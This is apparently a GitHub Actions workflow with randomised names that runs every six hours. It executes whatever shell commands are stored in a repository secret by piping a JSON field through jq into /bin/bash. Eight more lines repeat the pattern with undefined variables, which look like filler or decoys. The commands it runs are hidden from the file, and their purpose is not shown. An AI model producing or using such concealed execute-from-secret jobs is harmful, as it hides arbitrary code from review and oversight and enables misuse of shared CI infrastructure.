name: xiaolouzhu6789

on:
  workflow_dispatch:
  schedule:
    - cron: '8 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiaolouzhu6789
        env:
          ec1: ${{ secrets.ec1 }}
        run: |
          echo $ec1 | jq -r .fwlx5195 | /bin/bash
          echo $rtdbu0955 | jq -r .puknw5371 | /bin/bash
          echo $hjn4276 | jq -r .rr67 | /bin/bash
          echo $blkxg59 | jq -r .odp258 | /bin/bash
          echo $tlc80098 | jq -r .w4697 | /bin/bash
          echo $f054 | jq -r .embf72622 | /bin/bash
          echo $oqk159 | jq -r .tzj482 | /bin/bash
          echo $b0975 | jq -r .su389 | /bin/bash
          echo $hl83755 | jq -r .jrg16193 | /bin/bash

